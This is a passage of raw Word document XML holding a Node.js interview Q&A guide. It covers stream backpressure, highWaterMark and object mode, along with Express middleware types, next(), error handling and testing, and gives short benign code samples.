          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>finish: Emitted when all data has been written to a writable stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03868580"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6. How can you handle backpressure in Node.js streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC422F" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Backpressure occurs when a writable stream cannot process data as fast as a readable stream is sending it. You handle it by checking the return value of writable.write(). If it returns false, you should stop reading data until the drain event is emitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F23A5"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writeStream = fs.createWriteStream('output.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4761B5"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readStream.on('data', (chunk) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C44D5"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canWrite = writeStream.write(chunk);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D695E64"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(!canWrite) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E571950" w14:textId="29B9045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828"/>
        </w:tabs>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readStream.pause();</w:t>
      </w:r>
      <w:r w:rsidR="007B04C8" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E72FCFB"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1489F78" w14:textId="6836F3D9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1A7D15"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writeStream.on('drain', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D7B32"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readStream.resume();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC34EF"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37793C2"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7. What is the purpose of the highWaterMark option in streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C58A4" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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highWaterMark option controls the buffer size of a stream. It sets the maximum amount of data that can be stored in the internal buffer before the stream starts applying backpressure. It is defined in bytes for binary streams and in object counts for object mode streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109132EB"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8. What is the difference between a Duplex stream and a Transform stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B22B6" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Duplex stream is both readable and writable, allowing data to be read and written independently. A Transform stream is a type of Duplex stream where the output is computed based on the input, such as compressing or encrypting data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F6295"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9. How do you convert a readable stream into a promise?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C85A607" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>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You can convert a readable stream into a promise using stream.pipeline or by manually handling the data, end, and error events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5461F797"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pipeline } = require('stream');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D643E16"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promisify } = require('util');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEB0DB"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pipelinePromise = promisify(pipeline);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC37362"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2E2E6ECA" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51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await pipelinePromise(readStream, writeStream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CFC58" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. What is object mode in streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7849A850" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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In object mode, streams can read and write arbitrary JavaScript objects rather than only binary data or strings. This mode is useful when dealing with streams of non-buffer objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408F984" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DF33EA"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28" w:name="_Toc178383211"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q27. What is middleware in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="5EFB7AF9"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1. What is middleware in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A99E89" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Middleware in Node.js refers to functions that have access to the request (req) and response (res) objects, and the next middleware function in the application’s request-response cycle. Middleware functions can modify the request and response objects, end the request-response cycle, or call the next middleware in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633E62E"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2. What are some types of middleware in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001248A8" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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common types of middleware in Express.js include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A159E" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Application-level middleware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bound to an instance of the app object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C3E44" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Router-level middleware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bound to an instance of the Express Router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DA573" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-handling middleware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Middleware defined with four arguments (err, req, res, next).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590F216" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Built-in middleware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provided by Express (e.g., express.json()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A41081" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Third-party middleware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> External middleware packages (e.g., morgan, cors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A0EE4"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3. How does middleware work in the request-response cycle in Express?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9F521" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Middleware functions are executed sequentially in the order they are defined. When a request is received, it passes through each middleware in the stack until the response is sent or the cycle is terminated. Middleware can either handle the request/response or pass it to the next function using the next() function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFDC496"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4. How do you define and use middleware in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B80E9" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Middleware is defined as a function with req, res, and next as arguments. It can be used globally for all routes or for specific routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755492F"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4DE58590"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7941B7F5"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93B1941"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Global middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44B825"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36591BA3"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console.log('Time:', Date.now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13861EE6"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 // Pass control to the next middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C1980"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74B02F7"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3BD91CD"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Route-specific middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F37AC"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app.get('/user/:id', (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53577EED"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console.log('Request Type:', req.method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD21D6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8037B"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(req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA5F5F"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res.send('USER');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619A99B"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18CA74D"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BFB28E4"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app.listen(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5C663B"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5. What is the next() function in middleware, and why is it important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCAB023" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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next() function is used to pass control to the next middleware function in the stack. It’s important because it prevents the request-response cycle from being stuck, ensuring that other middleware functions or route handlers can process the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D40C39"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6. What happens if you don't call next() in a middleware function?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5DAEC" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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If next() is not called, the request-response cycle is halted, and the request will hang, as no further middleware or route handlers will be executed. This can lead to unresponsive routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C5F15"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7. How can you handle errors in middleware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8902F" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Errors in middleware can be handled by defining an error-handling middleware function that takes four arguments (err, req, res, next). This middleware is triggered whenever an error is passed to next().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1967B0D6"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app.use((err, req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7AF99"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1860B6"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res.status(500).send('Something broke!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3843280B"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36406A4"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8. What is the difference between application-level and router-level middleware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F707C" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>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Application-level middleware is bound to an Express app instance and applies to the entire application, while router-level middleware is bound to an instance of the Express Router and only applies to routes defined by that router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6B13A5"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9. How do you use third-party middleware in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD8F89" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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Third-party middleware can be installed via npm and integrated using app.use(). For example, using morgan for logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7A9AD"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morgan = require('morgan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F950D30"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app.use(morgan('tiny'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427E53F"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10. Can middleware be asynchronous, and how do you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599270A3" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Yes, middleware can be asynchronous. You can handle asynchronous operations within middleware using Promises, async/await, or callback functions. If using async/await, ensure you handle errors properly, usually by passing the error to next().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E29839"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app.use(async (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6A4F1"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422786F"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data = await someAsyncFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49730DB8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE22C0D"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C0D141"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next(err);  // Pass the error to the error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28287EFC"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49C5141"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BE5FDEE"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11. What are some common use cases for middleware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B9310" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Common use cases include logging, authentication, request parsing (e.g., JSON or URL-encoded data), handling CORS, serving static files, and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55B389"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12. What is the order of middleware execution in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D5902C" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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Middleware functions are executed in the order they are defined in the code. Therefore, the order in which middleware is registered using app.use() or router.use() is critical, as it determines the order of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908B623"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13. How do you apply middleware only to certain routes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E40217F" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>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Middleware can be applied to specific routes by passing it as an argument in the route definition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78561357"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app.get('/route', middlewareFunction, (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930DDB4" w14:textId="2E9DB2BC"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res.send('Hel</w:t>
      </w:r>
      <w:r w:rsidR="00600D8B" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lo, World!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B607DA" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D"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C57F849"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14. What are some built-in middleware functions provided by Express?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DCC3F0" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>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Some built-in middleware functions include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155C09B" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>express.json(): Parses incoming requests with JSON payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CABBDF" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>express.urlencoded(): Parses incoming requests with URL-encoded payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19963161" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>express.static(): Serves static files from a directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F12823" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15. How can you test middleware in Express?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D8EA6" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Middleware can be tested by writing unit tests using tools like supertest along with testing frameworks like Mocha or Jest. These tests can simulate requests and inspect how middleware functions modify requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0A192E" w14:textId="77777777" w:rsidR="00E53F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00E53F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD74723"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29" w:name="_Toc178383212"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q28. How do you create and use custom modules in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="07EF171F" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Creating a Custom Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56A725" w14:textId="77777777" w:rsidR="002C2983" w:rsidRPr="00DA2F32" w:rsidRDefault="002C2983" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
